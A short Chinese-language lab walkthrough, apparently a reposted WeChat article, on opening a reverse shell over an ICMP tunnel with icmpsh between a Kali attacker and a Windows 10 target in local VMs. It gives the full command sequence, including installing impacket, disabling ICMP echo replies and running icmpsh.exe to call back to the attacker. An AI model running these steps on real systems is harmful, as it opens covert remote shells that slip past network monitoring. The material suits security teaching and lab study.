ICMP协议工作方式简介
ICMP隧道
实验环境
Kali 192.168.0.199 win10 192.168.0.77
kali安装icmpsh
Kali安装icmpsh的依赖包
这里踩了个坑,装不了好像,然后用了下面的方法安装
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python setup.py install
sysctl -w net.ipv4.icmp_echo_ignore_all=1
(用完记得把他改回0)
Kali执行操作:python icmpsh_m.py 本机ip 目标ip
Win10直接icmpsh.exe -t 攻击机ip
Kali就可以接收一个icmp反弹回来的shell
接收到了,但是有点乱码。。又是一个坑。。
解决方法是,去目标机输入CHCP 65001
输入后再重新执行
解决了
Emm。。实际上,弹了shell后在shell里执行也是可以的。。上面纯粹多此一举。。
文章仅供学习参考,过程也是利用本地虚拟机演示,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者和本公众号无关。
注:如有侵权请联系删除
学习更多技术,关注我:
原文始发于微信公众号(编码安全研究):内网之ICMP隧道反弹shell——icmpsh
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论